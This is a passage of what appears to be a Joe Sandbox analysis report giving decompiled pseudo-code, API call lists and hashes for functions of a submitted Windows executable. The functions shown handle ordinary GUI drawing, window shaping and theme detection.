								 *((intOrPtr*)( *((intOrPtr*)( *_t220 + 0x1c4))))();
								_t368 = _v80;
							}
							_t374 =  *((intOrPtr*)( *_t279 + 0x1d8));
							 *0xe17a64();
							if( *((intOrPtr*)( *((intOrPtr*)( *_t279 + 0x1d8))))() != 0) {
								E00CB7A0A(_t279, _t368, _t364);
							}
						}
						goto L34;
					}
				}
				_t374 =  *((intOrPtr*)( *__ecx + 0x16c));
				 *0xe17a64();
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x16c))))() == 0) {
					goto L34;
				}
				goto L2;
			}

0x00ce302e
0x00ce3034
0x00ce303b
0x00ce303f
0x00ce3043
0x00ce3050
0x00ce305c
0x00ce307a
0x00ce307c
0x00ce3084
0x00ce3090
0x00ce356e
0x00ce3571
0x00ce357f
0x00ce357f
0x00ce3099
0x00ce309f
0x00ce30a2
0x00ce30a5
0x00ce30a8
0x00ce30ab
0x00ce30bb
0x00ce30cb
0x00ce30d3
0x00ce30d7
0x00ce30da
0x00ce30ec
0x00ce30f6
0x00ce30f9
0x00ce3104
0x00ce3110
0x00ce311c
0x00000000
0x00000000
0x00ce3124
0x00ce3125
0x00ce312d
0x00ce3130
0x00ce3133
0x00ce313e
0x00ce3145
0x00ce314d
0x00ce3155
0x00ce3156
0x00ce3157
0x00ce3158
0x00ce3159
0x00ce3164
0x00ce3166
0x00ce316b
0x00000000
0x00ce3171
0x00ce3171
0x00ce317e
0x00ce318e
0x00ce3197
0x00ce31b0
0x00ce31b8
0x00ce31b8
0x00ce31c8
0x00ce31c9
0x00ce31ca
0x00ce31cb
0x00ce31ce
0x00ce31da
0x00ce31e2
0x00ce31e7
0x00ce31ea
0x00ce31f4
0x00ce31f7
0x00ce3201
0x00ce321e
0x00ce322e
0x00ce3234
0x00ce323a
0x00ce3248
0x00ce324e
0x00ce3252
0x00ce3256
0x00ce3263
0x00ce3270
0x00ce3270
0x00ce3256
0x00ce323a
0x00ce3288
0x00ce3295
0x00ce329a
0x00ce329c
0x00ce32aa
0x00ce32c7
0x00ce32cf
0x00ce32ac
0x00ce32ad
0x00ce32b5
0x00ce32bb
0x00ce32bb
0x00ce32e0
0x00ce32e8
0x00ce32f4
0x00ce32fc
0x00ce3316
0x00ce331e
0x00ce3324
0x00ce3330
0x00ce333c
0x00ce334a
0x00ce3352
0x00ce3354
0x00ce3354
0x00ce333c
0x00ce3365
0x00ce336d
0x00ce3379
0x00ce3393
0x00ce339b
0x00ce339f
0x00ce33a7
0x00ce33af
0x00ce33b5
0x00ce33c3
0x00ce33cb
0x00ce33d1
0x00ce33d9
0x00ce33e1
0x00ce33e3
0x00ce33e3
0x00ce33ea
0x00ce33f2
0x00ce33f5
0x00ce33f8
0x00ce33fb
0x00ce3405
0x00ce3417
0x00ce341e
0x00ce3424
0x00ce342a
0x00ce342d
0x00ce3432
0x00ce343e
0x00ce3443
0x00ce3446
0x00ce3446
0x00ce3449
0x00ce344f
0x00ce3458
0x00ce3460
0x00ce3468
0x00ce346a
0x00ce346f
0x00ce3474
0x00ce3477
0x00ce3477
0x00ce348a
0x00ce34aa
0x00ce34b5
0x00ce34bb
0x00ce34bb
0x00ce34c5
0x00ce34cf
0x00ce34de
0x00ce34f6
0x00ce3506
0x00ce351e
0x00ce352a
0x00ce3532
0x00ce3542
0x00ce354a
0x00ce354c
0x00ce354c
0x00ce3551
0x00ce3559
0x00ce3565
0x00ce3569
0x00ce3569
0x00ce3565
0x00000000
0x00ce34c5
0x00ce316b
0x00ce3060
0x00ce3068
0x00ce3074
0x00000000
0x00000000
0x00000000

APIs

GetWindowRect.USER32 ref: 00CE30AB
GetCursorPos.USER32(?), ref: 00CE30DA
ClientToScreen.USER32(?,?), ref: 00CE30F9
ScreenToClient.USER32 ref: 00CE31F7
SendMessageA.USER32(?,00000202,0000FFFF,?), ref: 00CE321E
SendMessageA.USER32(?,00000202,00000000,?), ref: 00CE3270
GetParent.USER32(?), ref: 00CE3279
SetParent.USER32(?,?,00000000), ref: 00CE328E
GetWindowRect.USER32 ref: 00CE3405
ClientToScreen.USER32(?,?), ref: 00CE3424
OffsetRect.USER32(?,?,?), ref: 00CE348A
RedrawWindow.USER32(?,?,00000000,000005B1), ref: 00CE34F6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClientRectScreenWindow$MessageParentSend$CursorOffsetRedraw
String ID:
API String ID: 2611947581-0
Opcode ID: e28d183291f1bcc802fdeb3d23c45259c64738884c3dafeb5f47b22f04749f3e
Instruction ID: cdceae34c2cab762287296a954b466210efa679a24cbdf3148ddbc8bc8961262
Opcode Fuzzy Hash: e28d183291f1bcc802fdeb3d23c45259c64738884c3dafeb5f47b22f04749f3e
Instruction Fuzzy Hash: 17023775A042149FCF05DF65C998AAD7BF6FF49700F0440A9E85AAB3A1CB34AE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CDF346 Relevance: 18.2, APIs: 12, Instructions: 218
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CDF346(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t97;
				struct HDC__* _t109;
				int _t134;
				int _t137;
				int _t138;
				struct HDC__* _t159;
				struct HDC__* _t160;
				void* _t161;
				int _t163;
				intOrPtr _t165;
				long _t166;
				void* _t170;

				_t161 = __edx;
				_push(0x48);
				E00DDD52C(0xe0aa97, __ebx, __edi, __esi);
				_t137 =  *(_t170 + 0x2c);
				_t163 =  *(_t170 + 0x14);
				if(_t137 != 0xffffffff) {
					_t163 = _t137;
				}
				_t97 =  *(_t170 + 0x30);
				if(_t97 == 0xffffffff) {
					_t97 =  *(_t170 + 0x18);
				}
				_t165 =  *((intOrPtr*)(_t170 + 0x1c));
				 *(_t170 - 0x10) = _t97;
				if( *0xe872e8 != 0) {
					L9:
					E00CB9032(_t170 - 0x44);
					 *(_t170 - 4) =  *(_t170 - 4) & 0x00000000;
					E00CB9032(_t170 - 0x34);
					 *(_t170 - 4) = 1;
					E00CB9032(_t170 - 0x54);
					 *(_t170 - 4) = 2;
					E00CB9B84(_t137, _t170 - 0x44,  *((intOrPtr*)(_t170 + 8)));
					E00CB9B84(_t137, _t170 - 0x54, CreateCompatibleDC( *(_t170 - 0x40)));
					 *(_t170 - 0x20) =  *(_t170 - 0x20) & 0x00000000;
					 *((intOrPtr*)(_t170 - 0x24)) = 0xe196b4;
					 *(_t170 - 4) = 3;
					E00CB9B84(_t137, _t170 - 0x34, CreateCompatibleDC( *(_t170 - 0x40)));
					 *(_t170 - 0x18) =  *(_t170 - 0x18) & 0x00000000;
					 *((intOrPtr*)(_t170 - 0x1c)) = 0xe196b4;
					 *(_t170 - 4) = 4;
					E00CB9BC6(_t137, _t170 - 0x1c, _t163, CreateCompatibleBitmap( *(_t170 - 0x40), _t163,  *(_t170 - 0x10)));
					 *((intOrPtr*)(_t170 - 0x14)) = E00CBA251( *(_t170 - 0x30),  *(_t170 - 0x18));
					if(_t137 == 0xffffffff) {
						L16:
						if(_t165 != 0) {
							_t109 =  *(_t165 + 4);
						} else {
							_t109 = 0;
						}
						_t166 = 0xcc0020;
						BitBlt( *(_t170 - 0x30), 0, 0,  *(_t170 + 0x14),  *(_t170 + 0x18), _t109,  *(_t170 + 0x20),  *(_t170 + 0x24), 0xcc0020);
					} else {
						_t134 =  *(_t170 + 0x30);
						if(_t137 !=  *(_t170 + 0x14) || _t134 !=  *(_t170 + 0x18)) {
							if(_t165 != 0) {
								_t159 =  *(_t165 + 4);
							} else {
								_t159 = 0;
							}
							_t166 = 0xcc0020;
							StretchBlt( *(_t170 - 0x30), 0, 0, _t137, _t134, _t159,  *(_t170 + 0x20),  *(_t170 + 0x24),  *(_t170 + 0x14),  *(_t170 + 0x18), 0xcc0020);
						} else {
							goto L16;
						}
					}
					_t138 =  *(_t170 - 0x10);
					E00CB9BC6(_t138, _t170 - 0x24, _t163, CreateBitmap(_t163, _t138, 1, 1, 0));
					 *(_t170 - 0x10) = E00CBA251( *(_t170 - 0x50),  *(_t170 - 0x20));
					E00CBA37B(_t170 - 0x34, _t161,  *((intOrPtr*)(_t170 + 0x28)));
					BitBlt( *(_t170 - 0x50), 0, 0, _t163, _t138,  *(_t170 - 0x30), 0, 0, _t166);
					E00CBA37B(_t170 - 0x34, _t161, 0);
					E00CBA4ED(_t170 - 0x34, _t161, 0xffffff);
					BitBlt( *(_t170 - 0x30), 0, 0, _t163, _t138,  *(_t170 - 0x50), 0, 0, 0x8800c6);
					E00CBA37B(_t170 - 0x44, _t161, 0xffffff);
					E00CBA4ED(_t170 - 0x44, _t161, 0);
					BitBlt( *(_t170 - 0x40),  *(_t170 + 0xc),  *(_t170 + 0x10), _t163, _t138,  *(_t170 - 0x50), 0, 0, 0x8800c6);
					BitBlt( *(_t170 - 0x40),  *(_t170 + 0xc),  *(_t170 + 0x10), _t163, _t138,  *(_t170 - 0x30), 0, 0, 0xee0086);
					_t124 =  *(_t170 - 0x10);
					if( *(_t170 - 0x10) != 0) {
						E00CBA251( *(_t170 - 0x50),  *((intOrPtr*)(_t124 + 4)));
					}
					_t125 =  *((intOrPtr*)(_t170 - 0x14));
					if( *((intOrPtr*)(_t170 - 0x14)) != 0) {
						E00CBA251( *(_t170 - 0x30),  *((intOrPtr*)(_t125 + 4)));
					}
					E00CB9CE3(_t170 - 0x44);
					 *((intOrPtr*)(_t170 - 0x1c)) = 0xe196b4;
					E00CB91F0(_t170 - 0x1c, _t161);
					 *((intOrPtr*)(_t170 - 0x24)) = 0xe196b4;
					E00CB91F0(_t170 - 0x24, _t161);
					E00CB91A4(_t170 - 0x54);
					E00CB91A4(_t170 - 0x34);
					_t97 = E00CB91A4(_t170 - 0x44);
				} else {
					if(_t165 != 0) {
						_t160 =  *(_t165 + 4);
					} else {
						_t160 = 0;
					}
					__imp__TransparentBlt( *((intOrPtr*)(_t170 + 8)),  *(_t170 + 0xc),  *(_t170 + 0x10), _t163, _t97, _t160,  *(_t170 + 0x20),  *(_t170 + 0x24),  *(_t170 + 0x14),  *(_t170 + 0x18),  *((intOrPtr*)(_t170 + 0x28)));
					if(_t97 == 0) {
						goto L9;
					}
				}
				return E00DDD4FA(_t97);
			}

0x00cdf346
0x00cdf346
0x00cdf34d
0x00cdf352
0x00cdf355
0x00cdf35b
0x00cdf35d
0x00cdf35d
0x00cdf35f
0x00cdf365
0x00cdf367
0x00cdf367
0x00cdf371
0x00cdf374
0x00cdf377
0x00cdf3ad
0x00cdf3b0
0x00cdf3b5
0x00cdf3bc
0x00cdf3c4
0x00cdf3c8
0x00cdf3d3
0x00cdf3d7
0x00cdf3e9
0x00cdf3ee
0x00cdf3f2
0x00cdf3fc
0x00cdf40a
0x00cdf40f
0x00cdf413
0x00cdf41d
0x00cdf42f
0x00cdf43f
0x00cdf445
0x00cdf483
0x00cdf485
0x00cdf48b
0x00cdf487
0x00cdf487
0x00cdf487
0x00cdf48e
0x00cdf4a8
0x00cdf447
0x00cdf447
0x00cdf44d
0x00cdf456
0x00cdf45c
0x00cdf458
0x00cdf458
0x00cdf458
0x00cdf45f
0x00cdf47b
0x00000000
0x00000000
0x00000000
0x00cdf44d
0x00cdf4ae
0x00cdf4c3
0x00cdf4d9
0x00cdf4dc
0x00cdf4f0
0x00cdf4fa
0x00cdf508
0x00cdf520
0x00cdf52a
0x00cdf535
0x00cdf54f
0x00cdf56a
0x00cdf570
0x00cdf575
0x00cdf57d
0x00cdf57d
0x00cdf582
0x00cdf587
0x00cdf58f
0x00cdf58f
0x00cdf597
0x00cdf5a4
0x00cdf5a7
0x00cdf5af
0x00cdf5b2
0x00cdf5ba
0x00cdf5c2
0x00cdf5ca
0x00cdf379
0x00cdf37b
0x00cdf381
0x00cdf37d
0x00cdf37d
0x00cdf37d
0x00cdf39f
0x00cdf3a7
0x00000000
0x00000000
0x00cdf3a7
0x00cdf5d4

APIs

__EH_prolog3.LIBCMT ref: 00CDF34D
TransparentBlt.MSIMG32(?,?,?,?,?,?,?,?,?,?,?,00000048,00CDC7E3,?,?,?), ref: 00CDF39F
CreateCompatibleDC.GDI32(?), ref: 00CDF3DF
CreateCompatibleDC.GDI32(?), ref: 00CDF400
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00CDF425
StretchBlt.GDI32(?,00000000,00000000,?,?,00000004,00000000,00E196B4,?,00000000,00CC0020), ref: 00CDF47B
BitBlt.GDI32(?,00000000,00000000,?,00000000,00000004,00000000,00E196B4,00CC0020), ref: 00CDF4A8
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00CDF4B9
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00CDF4F0
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 00CDF520
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,008800C6), ref: 00CDF54F
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00EE0086), ref: 00CDF56A

Part of subcall function 00CB91A4: DeleteDC.GDI32(00000000), ref: 00CB91D8

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Create$Compatible$Bitmap$DeleteH_prolog3StretchTransparent
String ID:
API String ID: 646174778-0
Opcode ID: b49e11fc92d46f5fac710837bdb736b95919ca8a818862d35cd204c862c392ed
Instruction ID: 7e8c28b3f38757068de0aee0258d3d7aa21696095027fa7a9dbf8cc15405e344
Opcode Fuzzy Hash: b49e11fc92d46f5fac710837bdb736b95919ca8a818862d35cd204c862c392ed
Instruction Fuzzy Hash: 45810431901119AFCF22AFA1DD49EEEBB79FF18750F104118FA16761A1C7319E15EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CED703 Relevance: 18.1, APIs: 12, Instructions: 127
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CED703(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t48;
				void* _t96;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;

				_t96 = __edx;
				_push(0x10);
				E00DDD52C(0xe0b3e4, __ebx, __edi, __esi);
				if(E00CD8F9F(E00CC19ED()) != 0) {
					L9:
					_t48 = 0;
				} else {
					_t101 =  *((intOrPtr*)(_t102 + 8));
					if(E00CACB0B(_t101, 0xe27e18) == 0) {
						if(E00CACB0B(_t101, 0xe283a8) == 0) {
							goto L9;
						} else {
							_t98 =  *((intOrPtr*)(_t101 + 0x44c));
							goto L5;
						}
					} else {
						_t98 =  *((intOrPtr*)(_t101 + 0x230));
						L5:
						if(_t98 == 0 || IsWindowVisible( *(_t98 + 0x20)) == 0 ||  *((intOrPtr*)(_t98 + 0x328)) == 0) {
							goto L9;
						} else {
							 *(_t102 - 0x18) = 0;
							 *((intOrPtr*)(_t102 - 0x1c)) = 0xe1a644;
							 *((intOrPtr*)(_t102 - 4)) = 0;
							E00CB9BC6(0, _t102 - 0x1c, 0xe1a644, CreateRectRgn(0, 0,  *(_t102 + 0xc),  *(_t102 + 0x10)));
							 *(_t102 - 0x10) = 0;
							 *((intOrPtr*)(_t102 - 0x14)) = 0xe1a644;
							 *((char*)(_t102 - 4)) = 1;
							E00CB9BC6(0, _t102 - 0x14, 0xe1a644, CreateRectRgn(0, 0, 5, 5));
							CombineRgn( *(_t102 - 0x18),  *(_t102 - 0x10),  *(_t102 - 0x18), 3);
							E00CB9CCD(_t102 - 0x14);
							E00CB9BC6(0, _t102 - 0x14, 0xe1a644, CreateEllipticRgn(0, 0, 0xb, 0xb));
							CombineRgn( *(_t102 - 0x18),  *(_t102 - 0x10),  *(_t102 - 0x18), 2);
							E00CB9CCD(_t102 - 0x14);
							E00CB9BC6(0, _t102 - 0x14, 0xe1a644, CreateRectRgn( *(_t102 + 0xc) + 0xfffffffb, 0,  *(_t102 + 0xc), 5));
							CombineRgn( *(_t102 - 0x18),  *(_t102 - 0x10),  *(_t102 - 0x18), 3);
							E00CB9CCD(_t102 - 0x14);
							E00CB9BC6(0, _t102 - 0x14, 0xe1a644, CreateEllipticRgn( *(_t102 + 0xc) - 0xa, 0,  *(_t102 + 0xc) + 1, 0xb));
							CombineRgn( *(_t102 - 0x18),  *(_t102 - 0x10),  *(_t102 - 0x18), 2);
							SetWindowRgn( *(_t101 + 0x20), E00CB9D20(0, _t102 - 0x1c), 1);
							 *((intOrPtr*)(_t102 - 0x14)) = 0xe1a644;
							E00CB91F0(_t102 - 0x14, _t96);
							 *((intOrPtr*)(_t102 - 0x1c)) = 0xe1a644;
							E00CB91F0(_t102 - 0x1c, _t96);
							_t48 = 1;
						}
					}
				}
				return E00DDD4FA(_t48);
			}

0x00ced703
0x00ced703
0x00ced70a
0x00ced71d
0x00ced89a
0x00ced89a
0x00ced723
0x00ced723
0x00ced734
0x00ced74c
0x00000000
0x00ced752
0x00ced752
0x00000000
0x00ced752
0x00ced736
0x00ced736
0x00ced758
0x00ced75a
0x00000000
0x00ced77f
0x00ced784
0x00ced787
0x00ced78d
0x00ced79f
0x00ced7a4
0x00ced7a7
0x00ced7b0
0x00ced7be
0x00ced7ce
0x00ced7d7
0x00ced7ec
0x00ced7fc
0x00ced805
0x00ced81f
0x00ced82f
0x00ced838
0x00ced855
0x00ced865
0x00ced879
0x00ced882
0x00ced885
0x00ced88d
0x00ced890
0x00ced897
0x00ced897
0x00ced75a
0x00ced734
0x00ced8a1

APIs

__EH_prolog3.LIBCMT ref: 00CED70A
IsWindowVisible.USER32(?), ref: 00CED763
CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 00CED795
CreateRectRgn.GDI32(00000000,00000000,00000005,00000005), ref: 00CED7B4
CombineRgn.GDI32(?,?,?,00000003), ref: 00CED7CE
CreateEllipticRgn.GDI32(00000000,00000000,0000000B,0000000B), ref: 00CED7E2
CombineRgn.GDI32(?,?,?,00000002), ref: 00CED7FC
CreateRectRgn.GDI32(?,00000000,?,00000005), ref: 00CED815
CombineRgn.GDI32(?,?,?,00000003), ref: 00CED82F
CreateEllipticRgn.GDI32(?,00000000,?,0000000B), ref: 00CED84B
CombineRgn.GDI32(?,?,?,00000002), ref: 00CED865
SetWindowRgn.USER32(?,00000000,00000001), ref: 00CED879

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Create$Combine$Rect$EllipticWindow$H_prolog3Visible
String ID:
API String ID: 1706452674-0
Opcode ID: 4ac51863e0ce43f9ae7df621e9fa704c1fb5df23dcb984635b176ddd07128a32
Instruction ID: 42b99fd9a4fc3de40f57fca6f11887fca017bec41b23633e15c8df0d9fe57f28
Opcode Fuzzy Hash: 4ac51863e0ce43f9ae7df621e9fa704c1fb5df23dcb984635b176ddd07128a32
Instruction Fuzzy Hash: F541297190020AAFCF11AFA2DC9AEFFBB79FF04701F144418B256B61A1DB315A05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE685D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CE685D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t42;
				intOrPtr _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t63;
				void* _t92;
				intOrPtr _t94;
				void* _t96;

				E00DDD55F(0xe0ad2a, __ebx, __edi, __esi);
				_t92 = __ecx;
				_t94 = 0;
				E00DDFBE0(__ecx, _t96 - 0x310, 0, 0x200);
				E00DDFBE0(_t92, _t96 - 0x510, 0, 0x200);
				_t42 = _t96 - 0x310;
				__imp__GetCurrentThemeName(_t42, 0xff, _t96 - 0x510, 0xff, 0, 0, 0x510);
				if(_t42 == 0) {
					_push(_t96 - 0x310);
					E00CA9617(0x200, _t96 - 0x518, _t92, 0, __eflags);
					 *((intOrPtr*)(_t96 - 4)) = 0;
					_push(_t96 - 0x510);
					E00CA9617(0x200, _t96 - 0x51c, _t92, 0, __eflags);
					 *((char*)(_t96 - 4)) = 1;
					E00DEDD45( *((intOrPtr*)(_t96 - 0x518)), 0, 0, 0, 0, _t96 - 0x110, 0x100, 0, 0);
					_push(E00DEC1A0(_t96 - 0x110));
					E00CA2CD7(0x200, _t96 - 0x518, _t92, 0, _t96 - 0x110);
					_t53 = E00DEFE3A( *((intOrPtr*)(_t96 - 0x518)), "Luna");
					__eflags = _t53;
					if(_t53 == 0) {
						L4:
						__eflags =  *((intOrPtr*)(_t92 + 0x10));
						if( *((intOrPtr*)(_t92 + 0x10)) == 0) {
							L7:
							_t54 = E00DEFE3A( *((intOrPtr*)(_t96 - 0x51c)), "normalcolor");
							__eflags = _t54;
							if(_t54 != 0) {
								_t55 = E00DEFE3A( *((intOrPtr*)(_t96 - 0x51c)), "homestead");
								__eflags = _t55;
								if(_t55 != 0) {
									__eflags = E00DEFE3A( *((intOrPtr*)(_t96 - 0x51c)), "metallic");
									if(__eflags == 0) {
										_push(_t96 - 0x310);
										E00CA9617(0x200, _t96 - 0x514, _t92, _t94, __eflags);
										 *((char*)(_t96 - 4)) = 2;
										E00CE6DA9(0x200, _t96 - 0x514, __eflags);
										_t63 = E00CA7BFD(_t96 - 0x514, "royale", _t94);
										__eflags = _t63;
										if(_t63 < 0) {
											_t94 = 3;
										}
										_t55 = E00CA2975(_t63,  *((intOrPtr*)(_t96 - 0x514)) - 0x10);
									}
								} else {
									_t94 = 2;
								}
							} else {
								_t94 = 1;
							}
							L15:
							_t56 = E00CA2975(_t55,  *((intOrPtr*)(_t96 - 0x51c)) + 0xfffffff0);
							__eflags =  *((intOrPtr*)(_t96 - 0x518)) + 0xfffffff0;
							E00CA2975(_t56,  *((intOrPtr*)(_t96 - 0x518)) + 0xfffffff0);
							goto L16;
						}
						_t55 = _t96 - 0x514;
						 *((intOrPtr*)(_t96 - 0x514)) = _t94;
						__imp__GetThemeColor( *((intOrPtr*)(_t92 + 0x10)), 1, _t94, 0xeef, _t55);
						__eflags = _t55;
						if(_t55 != 0) {
							goto L15;
						}
						__eflags =  *((intOrPtr*)(_t96 - 0x514)) - 1;
						if( *((intOrPtr*)(_t96 - 0x514)) == 1) {
							goto L15;
						}
						goto L7;
					}
					_t55 = E00DEFE3A( *((intOrPtr*)(_t96 - 0x518)), "Aero");
					__eflags = _t55;
					if(_t55 != 0) {
						goto L15;
					}
					goto L4;
				} else {
					L16:
					return E00DDD50E(0x200, _t92, _t94);
				}
			}

0x00ce6867
0x00ce686c
0x00ce687a
0x00ce687e
0x00ce688c
0x00ce68a4
0x00ce68ab
0x00ce68b3
0x00ce68c3
0x00ce68ca
0x00ce68d5
0x00ce68d8
0x00ce68df
0x00ce68f1
0x00ce6900
0x00ce691a
0x00ce6922
0x00ce6932
0x00ce6939
0x00ce693b
0x00ce6957
0x00ce6957
0x00ce695b
0x00ce6990
0x00ce699b
0x00ce69a2
0x00ce69a4
0x00ce69b6
0x00ce69bd
0x00ce69bf
0x00ce69d8
0x00ce69da
0x00ce69e2
0x00ce69e9
0x00ce69f4
0x00ce69f8
0x00ce6a09
0x00ce6a0e
0x00ce6a10
0x00ce6a14
0x00ce6a14
0x00ce6a1e
0x00ce6a1e
0x00ce69c1
0x00ce69c3
0x00ce69c3
0x00ce69a6
0x00ce69a8
0x00ce69a8
0x00ce6a23
0x00ce6a2c
0x00ce6a37
0x00ce6a3a
0x00000000
0x00ce6a3f
0x00ce695d
0x00ce6963
0x00ce6975
0x00ce697b
0x00ce697d
0x00000000
0x00000000
0x00ce6983
0x00ce698a
0x00000000
0x00000000
0x00000000
0x00ce698a
0x00ce6948
0x00ce694f
0x00ce6951
0x00000000
0x00000000
0x00000000
0x00ce68b5
0x00ce6a41
0x00ce6a46
0x00ce6a46

APIs

__EH_prolog3_GS.LIBCMT ref: 00CE6867
GetCurrentThemeName.UXTHEME(?,000000FF,?,000000FF,00000000,00000000), ref: 00CE68AB
_strlen.LIBCMT ref: 00CE690C
GetThemeColor.UXTHEME(00000000,00000001,00000000,00000EEF,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CE6975

Strings

homestead, xrefs: 00CE69AB
Aero, xrefs: 00CE693D
Luna, xrefs: 00CE6927
normalcolor, xrefs: 00CE6990
royale, xrefs: 00CE69FE
metallic, xrefs: 00CE69C6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Theme$ColorCurrentH_prolog3_Name_strlen
String ID: Aero$Luna$homestead$metallic$normalcolor$royale
API String ID: 2055313444-2881773410
Opcode ID: 4a2b4edd1e48f6f765eb03871a00c9f70cedcc976f45caacd4cd1b0fb8951ef2
Instruction ID: 7263f5122215a5637e214f32986bdfcc001ffdc6c7f27debcf6dd601fb629afb
Opcode Fuzzy Hash: 4a2b4edd1e48f6f765eb03871a00c9f70cedcc976f45caacd4cd1b0fb8951ef2
Instruction Fuzzy Hash: 9241A17195066DAADB35EB22DC06BEB7B78EF15795F0000A5B018B20D2EA705BC4DEB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0A3DF Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00D0A3DF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t43;
				signed int _t51;
				void* _t75;
				void* _t76;
				unsigned int _t83;
				void* _t90;
				signed int* _t91;
				void* _t93;
				void* _t94;
				signed int _t99;
				signed int _t103;
				void* _t104;

				_t90 = __edx;
				_push(0x48);
				E00DDD52C(0xe0c37f, __ebx, __edi, __esi);
				_t93 =  *(_t104 + 8);
				if(_t93 == 0 || GetObjectA(_t93, 0x18, _t104 - 0x54) == 0 ||  *((intOrPtr*)(_t104 - 0x40)) == 0) {
					_t43 = 0;
				} else {
					 *(_t104 - 0x10) =  *(_t104 - 0x10) & 0x00000000;
					 *(_t104 - 0x1c) =  *(_t104 - 0x50);
					 *(_t104 - 0x18) =  *(_t104 - 0x4c);
					_t75 = E00D0A33C(_t104 - 0x1c, _t104 - 0x10);
					 *(_t104 - 0x14) = _t75;
					_t51 = E00DEC8A6(_t90,  *(_t104 - 0x4c));
					 *(_t104 - 0x18) = _t51;
					if(_t75 != 0) {
						_t103 =  *(_t104 - 0x50) * _t51;
						if( *((short*)(_t104 - 0x42)) != 0x20) {
							E00CB9032(_t104 - 0x3c);
							 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
							E00CB9B84(_t75, _t104 - 0x3c, CreateCompatibleDC(0));
							_t76 = SelectObject( *(_t104 - 0x38), _t93);
							if(_t76 != 0) {
								E00CB9032(_t104 - 0x2c);
								 *(_t104 - 4) = 1;
